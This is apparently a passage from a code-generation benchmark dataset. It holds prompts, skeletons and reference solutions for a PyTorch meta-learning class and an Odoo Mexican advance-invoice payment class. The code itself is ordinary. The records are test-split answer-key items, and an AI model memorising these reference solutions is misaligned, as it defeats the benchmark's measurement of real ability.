beta\nself.num_updates = num_updates\nself.learner = Learner(net_cls, *net_cls_args)\nself.optimizer = optim.Adam(self.learner.parameters(), lr=beta)", "hooks = []\nfor i, v in enumerate(self.learner.parameters()):\n\n def closure():\n ii = i\n return lambda grad: sum_grads_pi[ii]\n hooks.append(v.register_hook(closure()))\nself.optimizer.zero_grad()\ndummy_loss.backward()\nself.optimizer.step()\nfor h in hooks:\n h.remove()", "sum_grads_pi = None\nmeta_batchsz = support_y.size(0)\naccs = []\nfor i in range(meta_batchsz):\n _, grad_pi, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n if sum_grads_pi is None:\n sum_grads_pi = grad_pi\n else:\n sum_grads_pi = [torch.add(i, j) for i, j in zip(sum_grads_pi, grad_pi)]\ndummy_loss, _ = 
self.learner.net_forward(support_x[0], support_y[0])\nself.write_grads(dummy_loss, sum_grads_pi)\nreturn accs", "meta_batchsz = support_y.size(0)\naccs = []\nfor i in range(meta_batchsz):\n _, _, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\nreturn np.array(accs).mean()"], "bodies_text": "<|body_start_0|>\n super(MetaLearner, self).__init__()\n self.n_way = n_way\n self.k_shot = k_shot\n self.meta_batchsz = meta_batchsz\n self.beta = beta\n self.num_updates = num_updates\n self.learner = Learner(net_cls, *net_cls_args)\n self.optimizer = optim.Adam(self.learner.parameters(), lr=beta)\n<|end_body_0|>\n\n<|body_start_1|>\n hooks = []\n for i, v in enumerate(self.learner.parameters()):\n\n def closure():\n ii = i\n return lambda grad: sum_grads_pi[ii]\n hooks.append(v.register_hook(closure()))\n self.optimizer.zero_grad()\n dummy_loss.backward()\n self.optimizer.step()\n for h in hooks:\n h.remove()\n<|end_body_1|>\n\n<|body_start_2|>\n sum_grads_pi = None\n meta_batchsz = support_y.size(0)\n accs = []\n for i in range(meta_batchsz):\n _, grad_pi, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n if sum_grads_pi is None:\n sum_grads_pi = grad_pi\n else:\n sum_grads_pi = [torch.add(i, j) for i, j in zip(sum_grads_pi, grad_pi)]\n dummy_loss, _ = self.learner.net_forward(support_x[0], support_y[0])\n self.write_grads(dummy_loss, sum_grads_pi)\n return accs\n<|end_body_2|>\n\n<|body_start_3|>\n meta_batchsz = support_y.size(0)\n accs = []\n for i in range(meta_batchsz):\n _, _, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n return np.array(accs).mean()\n<|end_body_3|>\n", "class_docstring": "As we have mentioned in Learner class, the metalearner class will receive a series of loss on different tasks/episodes on theta_pi network, and it will merage all loss and then sum over it. The summed loss will be backproped on theta network to update theta parameters, which is the initialization point we want to find.", "class_name": "MetaLearner", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MetaLearner:\n \"\"\"As we have mentioned in Learner class, the metalearner class will receive a series of loss on different tasks/episodes on theta_pi network, and it will merage all loss and then sum over it. The summed loss will be backproped on theta network to update theta parameters, which is the initialization point we want to find.\"\"\"\n\n def __init__(self, net_cls, net_cls_args, n_way, k_shot, meta_batchsz, beta, num_updates):\n \"\"\":param net_cls: class, not instance. the class of specific Network for learner :param net_cls_args: tuple, args for net_cls, like (n_way, imgsz) :param n_way: :param k_shot: :param meta_batchsz: number of tasks/episode :param beta: learning rate for meta-learner :param num_updates: number of updates for learner\"\"\"\n <|body_0|>\n\n def write_grads(self, dummy_loss, sum_grads_pi):\n \"\"\"write loss into learner.net, gradients come from sum_grads_pi. Since the gradients info is not calculated by general backward, we need this function to write the right gradients into theta network and update theta parameters as wished. 
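# --- Editor's note (not part of the record above) ---
# The write_grads body in this MetaLearner record wraps each gradient hook in
# closure() so the loop index is captured by value. Without that wrapper,
# every lambda would see the final value of i, because Python closures bind
# variables, not values. A torch-free sketch of the pitfall and of the
# record's closure()/ii fix (_bind is an illustrative name):
late = [lambda: i for i in range(3)]          # all three share one i, now 2
assert [f() for f in late] == [2, 2, 2]

def _bind(i):
    # The extra function scope freezes the current value of i,
    # same idea as the record's closure()/ii pattern.
    return lambda: i

bound = [_bind(i) for i in range(3)]
assert [f() for f in bound] == [0, 1, 2]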
:param dummy_loss: dummy loss, nothing but to write our gradients by hook :param sum_grads_pi: the summed gradients :return:\"\"\"\n <|body_1|>\n\n def forward(self, support_x, support_y, query_x, query_y):\n \"\"\"Here we receive a series of episode, each episode will be learned by learner and get a loss on parameters theta. we gather the loss and sum all the loss and then update theta network. setsz = n_way * k_shotf querysz = n_way * k_shot :param support_x: [meta_batchsz, setsz, c_, h, w] :param support_y: [meta_batchsz, setsz] :param query_x: [meta_batchsz, querysz, c_, h, w] :param query_y: [meta_batchsz, querysz] :return:\"\"\"\n <|body_2|>\n\n def pred(self, support_x, support_y, query_x, query_y):\n \"\"\"predict for query_x :param support_x: :param support_y: :param query_x: :param query_y: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(MetaLearner, self).__init__()\n self.n_way = n_way\n self.k_shot = k_shot\n self.meta_batchsz = meta_batchsz\n self.beta = beta\n self.num_updates = num_updates\n self.learner = Learner(net_cls, *net_cls_args)\n self.optimizer = optim.Adam(self.learner.parameters(), lr=beta)\n<|end_body_0|>\n\n<|body_start_1|>\n hooks = []\n for i, v in enumerate(self.learner.parameters()):\n\n def closure():\n ii = i\n return lambda grad: sum_grads_pi[ii]\n hooks.append(v.register_hook(closure()))\n self.optimizer.zero_grad()\n dummy_loss.backward()\n self.optimizer.step()\n for h in hooks:\n h.remove()\n<|end_body_1|>\n\n<|body_start_2|>\n sum_grads_pi = None\n meta_batchsz = support_y.size(0)\n accs = []\n for i in range(meta_batchsz):\n _, grad_pi, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n if sum_grads_pi is None:\n sum_grads_pi = grad_pi\n else:\n sum_grads_pi = [torch.add(i, j) for i, j in zip(sum_grads_pi, grad_pi)]\n dummy_loss, _ = self.learner.net_forward(support_x[0], support_y[0])\n self.write_grads(dummy_loss, sum_grads_pi)\n return accs\n<|end_body_2|>\n\n<|body_start_3|>\n meta_batchsz = support_y.size(0)\n accs = []\n for i in range(meta_batchsz):\n _, _, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n return np.array(accs).mean()\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000166", "length_bytes": 9798, "license_type": "no_license", "methods": [{"docstring": ":param net_cls: class, not instance. the class of specific Network for learner :param net_cls_args: tuple, args for net_cls, like (n_way, imgsz) :param n_way: :param k_shot: :param meta_batchsz: number of tasks/episode :param beta: learning rate for meta-learner :param num_updates: number of updates for learner", "name": "__init__", "signature": "def __init__(self, net_cls, net_cls_args, n_way, k_shot, meta_batchsz, beta, num_updates)"}, {"docstring": "write loss into learner.net, gradients come from sum_grads_pi. Since the gradients info is not calculated by general backward, we need this function to write the right gradients into theta network and update theta parameters as wished. :param dummy_loss: dummy loss, nothing but to write our gradients by hook :param sum_grads_pi: the summed gradients :return:", "name": "write_grads", "signature": "def write_grads(self, dummy_loss, sum_grads_pi)"}, {"docstring": "Here we receive a series of episode, each episode will be learned by learner and get a loss on parameters theta. we gather the loss and sum all the loss and then update theta network. 
setsz = n_way * k_shotf querysz = n_way * k_shot :param support_x: [meta_batchsz, setsz, c_, h, w] :param support_y: [meta_batchsz, setsz] :param query_x: [meta_batchsz, querysz, c_, h, w] :param query_y: [meta_batchsz, querysz] :return:", "name": "forward", "signature": "def forward(self, support_x, support_y, query_x, query_y)"}, {"docstring": "predict for query_x :param support_x: :param support_y: :param query_x: :param query_y: :return:", "name": "pred", "signature": "def pred(self, support_x, support_y, query_x, query_y)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_005262", "prompt": "Implement the Python class `MetaLearner` described below.\n\nClass description:\nAs we have mentioned in Learner class, the metalearner class will receive a series of loss on different tasks/episodes on theta_pi network, and it will merage all loss and then sum over it. The summed loss will be backproped on theta network to update theta parameters, which is the initialization point we want to find.\n\nMethod signatures and docstrings:\n- def __init__(self, net_cls, net_cls_args, n_way, k_shot, meta_batchsz, beta, num_updates): :param net_cls: class, not instance. the class of specific Network for learner :param net_cls_args: tuple, args for net_cls, like (n_way, imgsz) :param n_way: :param k_shot: :param meta_batchsz: number of tasks/episode :param beta: learning rate for meta-learner :param num_updates: number of updates for learner\n- def write_grads(self, dummy_loss, sum_grads_pi): write loss into learner.net, gradients come from sum_grads_pi. Since the gradients info is not calculated by general backward, we need this function to write the right gradients into theta network and update theta parameters as wished. :param dummy_loss: dummy loss, nothing but to write our gradients by hook :param sum_grads_pi: the summed gradients :return:\n- def forward(self, support_x, support_y, query_x, query_y): Here we receive a series of episode, each episode will be learned by learner and get a loss on parameters theta. we gather the loss and sum all the loss and then update theta network. setsz = n_way * k_shotf querysz = n_way * k_shot :param support_x: [meta_batchsz, setsz, c_, h, w] :param support_y: [meta_batchsz, setsz] :param query_x: [meta_batchsz, querysz, c_, h, w] :param query_y: [meta_batchsz, querysz] :return:\n- def pred(self, support_x, support_y, query_x, query_y): predict for query_x :param support_x: :param support_y: :param query_x: :param query_y: :return:", "prompted_full_text": "Implement the Python class `MetaLearner` described below.\n\nClass description:\nAs we have mentioned in Learner class, the metalearner class will receive a series of loss on different tasks/episodes on theta_pi network, and it will merage all loss and then sum over it. The summed loss will be backproped on theta network to update theta parameters, which is the initialization point we want to find.\n\nMethod signatures and docstrings:\n- def __init__(self, net_cls, net_cls_args, n_way, k_shot, meta_batchsz, beta, num_updates): :param net_cls: class, not instance. the class of specific Network for learner :param net_cls_args: tuple, args for net_cls, like (n_way, imgsz) :param n_way: :param k_shot: :param meta_batchsz: number of tasks/episode :param beta: learning rate for meta-learner :param num_updates: number of updates for learner\n- def write_grads(self, dummy_loss, sum_grads_pi): write loss into learner.net, gradients come from sum_grads_pi. 
Since the gradients info is not calculated by general backward, we need this function to write the right gradients into theta network and update theta parameters as wished. :param dummy_loss: dummy loss, nothing but to write our gradients by hook :param sum_grads_pi: the summed gradients :return:\n- def forward(self, support_x, support_y, query_x, query_y): Here we receive a series of episode, each episode will be learned by learner and get a loss on parameters theta. we gather the loss and sum all the loss and then update theta network. setsz = n_way * k_shotf querysz = n_way * k_shot :param support_x: [meta_batchsz, setsz, c_, h, w] :param support_y: [meta_batchsz, setsz] :param query_x: [meta_batchsz, querysz, c_, h, w] :param query_y: [meta_batchsz, querysz] :return:\n- def pred(self, support_x, support_y, query_x, query_y): predict for query_x :param support_x: :param support_y: :param query_x: :param query_y: :return:\n\n<|skeleton|>\nclass MetaLearner:\n \"\"\"As we have mentioned in Learner class, the metalearner class will receive a series of loss on different tasks/episodes on theta_pi network, and it will merage all loss and then sum over it. The summed loss will be backproped on theta network to update theta parameters, which is the initialization point we want to find.\"\"\"\n\n def __init__(self, net_cls, net_cls_args, n_way, k_shot, meta_batchsz, beta, num_updates):\n \"\"\":param net_cls: class, not instance. the class of specific Network for learner :param net_cls_args: tuple, args for net_cls, like (n_way, imgsz) :param n_way: :param k_shot: :param meta_batchsz: number of tasks/episode :param beta: learning rate for meta-learner :param num_updates: number of updates for learner\"\"\"\n <|body_0|>\n\n def write_grads(self, dummy_loss, sum_grads_pi):\n \"\"\"write loss into learner.net, gradients come from sum_grads_pi. Since the gradients info is not calculated by general backward, we need this function to write the right gradients into theta network and update theta parameters as wished. :param dummy_loss: dummy loss, nothing but to write our gradients by hook :param sum_grads_pi: the summed gradients :return:\"\"\"\n <|body_1|>\n\n def forward(self, support_x, support_y, query_x, query_y):\n \"\"\"Here we receive a series of episode, each episode will be learned by learner and get a loss on parameters theta. we gather the loss and sum all the loss and then update theta network. 
setsz = n_way * k_shotf querysz = n_way * k_shot :param support_x: [meta_batchsz, setsz, c_, h, w] :param support_y: [meta_batchsz, setsz] :param query_x: [meta_batchsz, querysz, c_, h, w] :param query_y: [meta_batchsz, querysz] :return:\"\"\"\n <|body_2|>\n\n def pred(self, support_x, support_y, query_x, query_y):\n \"\"\"predict for query_x :param support_x: :param support_y: :param query_x: :param query_y: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(MetaLearner, self).__init__()\n self.n_way = n_way\n self.k_shot = k_shot\n self.meta_batchsz = meta_batchsz\n self.beta = beta\n self.num_updates = num_updates\n self.learner = Learner(net_cls, *net_cls_args)\n self.optimizer = optim.Adam(self.learner.parameters(), lr=beta)\n<|end_body_0|>\n\n<|body_start_1|>\n hooks = []\n for i, v in enumerate(self.learner.parameters()):\n\n def closure():\n ii = i\n return lambda grad: sum_grads_pi[ii]\n hooks.append(v.register_hook(closure()))\n self.optimizer.zero_grad()\n dummy_loss.backward()\n self.optimizer.step()\n for h in hooks:\n h.remove()\n<|end_body_1|>\n\n<|body_start_2|>\n sum_grads_pi = None\n meta_batchsz = support_y.size(0)\n accs = []\n for i in range(meta_batchsz):\n _, grad_pi, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n if sum_grads_pi is None:\n sum_grads_pi = grad_pi\n else:\n sum_grads_pi = [torch.add(i, j) for i, j in zip(sum_grads_pi, grad_pi)]\n dummy_loss, _ = self.learner.net_forward(support_x[0], support_y[0])\n self.write_grads(dummy_loss, sum_grads_pi)\n return accs\n<|end_body_2|>\n\n<|body_start_3|>\n meta_batchsz = support_y.size(0)\n accs = []\n for i in range(meta_batchsz):\n _, _, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n return np.array(accs).mean()\n<|end_body_3|>\n", "revision_id": "7e55a422588c1d1e00f35a3d3a3ff896cce59e18", "skeleton": "<|skeleton|>\nclass MetaLearner:\n \"\"\"As we have mentioned in Learner class, the metalearner class will receive a series of loss on different tasks/episodes on theta_pi network, and it will merage all loss and then sum over it. The summed loss will be backproped on theta network to update theta parameters, which is the initialization point we want to find.\"\"\"\n\n def __init__(self, net_cls, net_cls_args, n_way, k_shot, meta_batchsz, beta, num_updates):\n \"\"\":param net_cls: class, not instance. the class of specific Network for learner :param net_cls_args: tuple, args for net_cls, like (n_way, imgsz) :param n_way: :param k_shot: :param meta_batchsz: number of tasks/episode :param beta: learning rate for meta-learner :param num_updates: number of updates for learner\"\"\"\n <|body_0|>\n\n def write_grads(self, dummy_loss, sum_grads_pi):\n \"\"\"write loss into learner.net, gradients come from sum_grads_pi. Since the gradients info is not calculated by general backward, we need this function to write the right gradients into theta network and update theta parameters as wished. :param dummy_loss: dummy loss, nothing but to write our gradients by hook :param sum_grads_pi: the summed gradients :return:\"\"\"\n <|body_1|>\n\n def forward(self, support_x, support_y, query_x, query_y):\n \"\"\"Here we receive a series of episode, each episode will be learned by learner and get a loss on parameters theta. we gather the loss and sum all the loss and then update theta network. 
setsz = n_way * k_shotf querysz = n_way * k_shot :param support_x: [meta_batchsz, setsz, c_, h, w] :param support_y: [meta_batchsz, setsz] :param query_x: [meta_batchsz, querysz, c_, h, w] :param query_y: [meta_batchsz, querysz] :return:\"\"\"\n <|body_2|>\n\n def pred(self, support_x, support_y, query_x, query_y):\n \"\"\"predict for query_x :param support_x: :param support_y: :param query_x: :param query_y: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MetaLearner:\n \"\"\"As we have mentioned in Learner class, the metalearner class will receive a series of loss on different tasks/episodes on theta_pi network, and it will merage all loss and then sum over it. The summed loss will be backproped on theta network to update theta parameters, which is the initialization point we want to find.\"\"\"\n\n def __init__(self, net_cls, net_cls_args, n_way, k_shot, meta_batchsz, beta, num_updates):\n \"\"\":param net_cls: class, not instance. the class of specific Network for learner :param net_cls_args: tuple, args for net_cls, like (n_way, imgsz) :param n_way: :param k_shot: :param meta_batchsz: number of tasks/episode :param beta: learning rate for meta-learner :param num_updates: number of updates for learner\"\"\"\n super(MetaLearner, self).__init__()\n self.n_way = n_way\n self.k_shot = k_shot\n self.meta_batchsz = meta_batchsz\n self.beta = beta\n self.num_updates = num_updates\n self.learner = Learner(net_cls, *net_cls_args)\n self.optimizer = optim.Adam(self.learner.parameters(), lr=beta)\n\n def write_grads(self, dummy_loss, sum_grads_pi):\n \"\"\"write loss into learner.net, gradients come from sum_grads_pi. Since the gradients info is not calculated by general backward, we need this function to write the right gradients into theta network and update theta parameters as wished. :param dummy_loss: dummy loss, nothing but to write our gradients by hook :param sum_grads_pi: the summed gradients :return:\"\"\"\n hooks = []\n for i, v in enumerate(self.learner.parameters()):\n\n def closure():\n ii = i\n return lambda grad: sum_grads_pi[ii]\n hooks.append(v.register_hook(closure()))\n self.optimizer.zero_grad()\n dummy_loss.backward()\n self.optimizer.step()\n for h in hooks:\n h.remove()\n\n def forward(self, support_x, support_y, query_x, query_y):\n \"\"\"Here we receive a series of episode, each episode will be learned by learner and get a loss on parameters theta. we gather the loss and sum all the loss and then update theta network. 
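# --- Editor's note (not part of the record above) ---
# The forward body in this record accumulates per-episode gradients
# elementwise (sum_grads_pi = [torch.add(i, j) for i, j in zip(...)]) before
# writing them back through the hooks. A torch-free sketch of that
# accumulation step over hypothetical per-task gradient lists
# (accumulate_task_grads is an illustrative name):
def accumulate_task_grads(per_task_grads):
    """Sum same-shaped per-task gradient lists elementwise."""
    total = None
    for grads in per_task_grads:
        if total is None:
            total = list(grads)          # first task seeds the running sum
        else:
            total = [a + b for a, b in zip(total, grads)]
    return total

tasks = [[1.0, -2.0], [3.0, 4.0], [0.5, 1.0]]   # 3 tasks, 2 "parameters"
assert accumulate_task_grads(tasks) == [4.5, 3.0]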
setsz = n_way * k_shotf querysz = n_way * k_shot :param support_x: [meta_batchsz, setsz, c_, h, w] :param support_y: [meta_batchsz, setsz] :param query_x: [meta_batchsz, querysz, c_, h, w] :param query_y: [meta_batchsz, querysz] :return:\"\"\"\n sum_grads_pi = None\n meta_batchsz = support_y.size(0)\n accs = []\n for i in range(meta_batchsz):\n _, grad_pi, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n if sum_grads_pi is None:\n sum_grads_pi = grad_pi\n else:\n sum_grads_pi = [torch.add(i, j) for i, j in zip(sum_grads_pi, grad_pi)]\n dummy_loss, _ = self.learner.net_forward(support_x[0], support_y[0])\n self.write_grads(dummy_loss, sum_grads_pi)\n return accs\n\n def pred(self, support_x, support_y, query_x, query_y):\n \"\"\"predict for query_x :param support_x: :param support_y: :param query_x: :param query_y: :return:\"\"\"\n meta_batchsz = support_y.size(0)\n accs = []\n for i in range(meta_batchsz):\n _, _, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n return np.array(accs).mean()\n", "source": "the_stack_v2_python_sparse", "source_path": "generated/test_dragen1860_Reptile_Pytorch.py", "source_repo": "jansel/pytorch-jit-paritybench", "split": "test", "star_events_count": 35} {"blob_id": "3353011ceb206cca6b112b49fc4233530f4fcdee", "bodies": ["for rec in self:\n amount = rec.amount * (1 if rec.payment_type in ('outbound', 'transfer') else -1)\n is_required = rec.l10n_mx_edi_advance_is_required(amount)\n if is_required:\n rec._l10n_mx_edi_generate_advance(is_required)\nreturn super(AccountPayment, self).post()", "self.ensure_one()\nif self.payment_type != 'inbound' or (self.invoice_ids and self.payment_difference >= 0) or self.company_id.country_id != self.env.ref('base.mx'):\n return False\nmessages = []\ncompany = self.company_id\nif not company.l10n_mx_edi_product_advance_id:\n messages.append(_('The product that must be used in the advance invoice line is not configured in the accounting settings.'))\nif not company.l10n_mx_edi_journal_advance_id:\n messages.append(_('The journal that must be used in the advance invoice is not configured in the accounting settings.'))\naml = self.env['account.move.line'].with_context(check_move_validity=False, date=self.payment_date)\npartner = self.partner_id._find_accounting_partner(self.partner_id)\ndebit, credit, _amount_currency, _currency_id = aml._compute_amount_fields(amount, self.currency_id, self.company_id.currency_id)\nlines = self.env['account.move.line'].read_group([('partner_id', '=', partner.id), ('account_id', '=', partner.property_account_receivable_id.id), ('move_id.state', '=', 'posted')], ['debit', 'credit'], 'partner_id')\ndebt = company.currency_id.round(lines[0]['debit'] + debit - (lines[0]['credit'] + credit)) if lines else 0.0\nif debt > 0:\n messages.append(_('This payment do not generate advance because the customer has invoices with pending payment.'))\nif not messages:\n return self.payment_difference or debt or amount\nself.message_post(body=_('This record cannot create the advance document automatically for the next reason: %sFor this record, you need create the invoice manually and reconcile it with this payment or cancel and validate again after that the data was completed.') % create_list_html(messages))\nreturn False", "advance = self.env['account.move'].advance(self.env['res.partner']._find_accounting_partner(self.partner_id), abs(amount), 
self.currency_id)\nadvance.message_post_with_view('mail.message_origin_link', values={'self': advance, 'origin': self}, subtype_id=self.env.ref('mail.mt_note').id)\nself.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance_created', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\nadvance.date_invoice = self.payment_date\nctx = {'disable_after_commit': True}\nadvance.with_context(**ctx).action_post()\nif advance.l10n_mx_edi_pac_status == 'signed':\n self.invoice_ids = [(4, advance.id)]\n advance._compute_cfdi_values()\n return advance\nself.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\nadvance.button_cancel()\nadvance.button_draft()\nreturn advance"], "bodies_text": "<|body_start_0|>\n for rec in self:\n amount = rec.amount * (1 if rec.payment_type in ('outbound', 'transfer') else -1)\n is_required = rec.l10n_mx_edi_advance_is_required(amount)\n if is_required:\n rec._l10n_mx_edi_generate_advance(is_required)\n return super(AccountPayment, self).post()\n<|end_body_0|>\n\n<|body_start_1|>\n self.ensure_one()\n if self.payment_type != 'inbound' or (self.invoice_ids and self.payment_difference >= 0) or self.company_id.country_id != self.env.ref('base.mx'):\n return False\n messages = []\n company = self.company_id\n if not company.l10n_mx_edi_product_advance_id:\n messages.append(_('The product that must be used in the advance invoice line is not configured in the accounting settings.'))\n if not company.l10n_mx_edi_journal_advance_id:\n messages.append(_('The journal that must be used in the advance invoice is not configured in the accounting settings.'))\n aml = self.env['account.move.line'].with_context(check_move_validity=False, date=self.payment_date)\n partner = self.partner_id._find_accounting_partner(self.partner_id)\n debit, credit, _amount_currency, _currency_id = aml._compute_amount_fields(amount, self.currency_id, self.company_id.currency_id)\n lines = self.env['account.move.line'].read_group([('partner_id', '=', partner.id), ('account_id', '=', partner.property_account_receivable_id.id), ('move_id.state', '=', 'posted')], ['debit', 'credit'], 'partner_id')\n debt = company.currency_id.round(lines[0]['debit'] + debit - (lines[0]['credit'] + credit)) if lines else 0.0\n if debt > 0:\n messages.append(_('This payment do not generate advance because the customer has invoices with pending payment.'))\n if not messages:\n return self.payment_difference or debt or amount\n self.message_post(body=_('This record cannot create the advance document automatically for the next reason: %sFor this record, you need create the invoice manually and reconcile it with this payment or cancel and validate again after that the data was completed.') % create_list_html(messages))\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n advance = self.env['account.move'].advance(self.env['res.partner']._find_accounting_partner(self.partner_id), abs(amount), self.currency_id)\n advance.message_post_with_view('mail.message_origin_link', values={'self': advance, 'origin': self}, subtype_id=self.env.ref('mail.mt_note').id)\n self.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance_created', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\n advance.date_invoice = self.payment_date\n ctx = {'disable_after_commit': True}\n advance.with_context(**ctx).action_post()\n if 
advance.l10n_mx_edi_pac_status == 'signed':\n self.invoice_ids = [(4, advance.id)]\n advance._compute_cfdi_values()\n return advance\n self.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\n advance.button_cancel()\n advance.button_draft()\n return advance\n<|end_body_2|>\n", "class_docstring": "", "class_name": "AccountPayment", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AccountPayment:\n\n def post(self):\n \"\"\"Inherit to create the advance when is necessary\"\"\"\n <|body_0|>\n\n def l10n_mx_edi_advance_is_required(self, amount):\n \"\"\"Verify that the configuration necessary to create the advance invoice is complete.\"\"\"\n <|body_1|>\n\n def _l10n_mx_edi_generate_advance(self, amount):\n \"\"\"Return if with the payment must be created the invoice for the advance\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for rec in self:\n amount = rec.amount * (1 if rec.payment_type in ('outbound', 'transfer') else -1)\n is_required = rec.l10n_mx_edi_advance_is_required(amount)\n if is_required:\n rec._l10n_mx_edi_generate_advance(is_required)\n return super(AccountPayment, self).post()\n<|end_body_0|>\n\n<|body_start_1|>\n self.ensure_one()\n if self.payment_type != 'inbound' or (self.invoice_ids and self.payment_difference >= 0) or self.company_id.country_id != self.env.ref('base.mx'):\n return False\n messages = []\n company = self.company_id\n if not company.l10n_mx_edi_product_advance_id:\n messages.append(_('The product that must be used in the advance invoice line is not configured in the accounting settings.'))\n if not company.l10n_mx_edi_journal_advance_id:\n messages.append(_('The journal that must be used in the advance invoice is not configured in the accounting settings.'))\n aml = self.env['account.move.line'].with_context(check_move_validity=False, date=self.payment_date)\n partner = self.partner_id._find_accounting_partner(self.partner_id)\n debit, credit, _amount_currency, _currency_id = aml._compute_amount_fields(amount, self.currency_id, self.company_id.currency_id)\n lines = self.env['account.move.line'].read_group([('partner_id', '=', partner.id), ('account_id', '=', partner.property_account_receivable_id.id), ('move_id.state', '=', 'posted')], ['debit', 'credit'], 'partner_id')\n debt = company.currency_id.round(lines[0]['debit'] + debit - (lines[0]['credit'] + credit)) if lines else 0.0\n if debt > 0:\n messages.append(_('This payment do not generate advance because the customer has invoices with pending payment.'))\n if not messages:\n return self.payment_difference or debt or amount\n self.message_post(body=_('This record cannot create the advance document automatically for the next reason: %sFor this record, you need create the invoice manually and reconcile it with this payment or cancel and validate again after that the data was completed.') % create_list_html(messages))\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n advance = self.env['account.move'].advance(self.env['res.partner']._find_accounting_partner(self.partner_id), abs(amount), self.currency_id)\n advance.message_post_with_view('mail.message_origin_link', values={'self': advance, 'origin': self}, subtype_id=self.env.ref('mail.mt_note').id)\n self.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance_created', values={'self': self, 'origin': advance}, 
subtype_id=self.env.ref('mail.mt_note').id)\n advance.date_invoice = self.payment_date\n ctx = {'disable_after_commit': True}\n advance.with_context(**ctx).action_post()\n if advance.l10n_mx_edi_pac_status == 'signed':\n self.invoice_ids = [(4, advance.id)]\n advance._compute_cfdi_values()\n return advance\n self.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\n advance.button_cancel()\n advance.button_draft()\n return advance\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000167", "length_bytes": 4664, "license_type": "no_license", "methods": [{"docstring": "Inherit to create the advance when is necessary", "name": "post", "signature": "def post(self)"}, {"docstring": "Verify that the configuration necessary to create the advance invoice is complete.", "name": "l10n_mx_edi_advance_is_required", "signature": "def l10n_mx_edi_advance_is_required(self, amount)"}, {"docstring": "Return if with the payment must be created the invoice for the advance", "name": "_l10n_mx_edi_generate_advance", "signature": "def _l10n_mx_edi_generate_advance(self, amount)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_004813", "prompt": "Implement the Python class `AccountPayment` described below.\n\nClass description:\nImplement the AccountPayment class.\n\nMethod signatures and docstrings:\n- def post(self): Inherit to create the advance when is necessary\n- def l10n_mx_edi_advance_is_required(self, amount): Verify that the configuration necessary to create the advance invoice is complete.\n- def _l10n_mx_edi_generate_advance(self, amount): Return if with the payment must be created the invoice for the advance", "prompted_full_text": "Implement the Python class `AccountPayment` described below.\n\nClass description:\nImplement the AccountPayment class.\n\nMethod signatures and docstrings:\n- def post(self): Inherit to create the advance when is necessary\n- def l10n_mx_edi_advance_is_required(self, amount): Verify that the configuration necessary to create the advance invoice is complete.\n- def _l10n_mx_edi_generate_advance(self, amount): Return if with the payment must be created the invoice for the advance\n\n<|skeleton|>\nclass AccountPayment:\n\n def post(self):\n \"\"\"Inherit to create the advance when is necessary\"\"\"\n <|body_0|>\n\n def l10n_mx_edi_advance_is_required(self, amount):\n \"\"\"Verify that the configuration necessary to create the advance invoice is complete.\"\"\"\n <|body_1|>\n\n def _l10n_mx_edi_generate_advance(self, amount):\n \"\"\"Return if with the payment must be created the invoice for the advance\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for rec in self:\n amount = rec.amount * (1 if rec.payment_type in ('outbound', 'transfer') else -1)\n is_required = rec.l10n_mx_edi_advance_is_required(amount)\n if is_required:\n rec._l10n_mx_edi_generate_advance(is_required)\n return super(AccountPayment, self).post()\n<|end_body_0|>\n\n<|body_start_1|>\n self.ensure_one()\n if self.payment_type != 'inbound' or (self.invoice_ids and self.payment_difference >= 0) or self.company_id.country_id != self.env.ref('base.mx'):\n return False\n messages = []\n company = self.company_id\n if not company.l10n_mx_edi_product_advance_id:\n messages.append(_('The product that must be used in the advance invoice line is not configured in the accounting settings.'))\n if not company.l10n_mx_edi_journal_advance_id:\n messages.append(_('The 
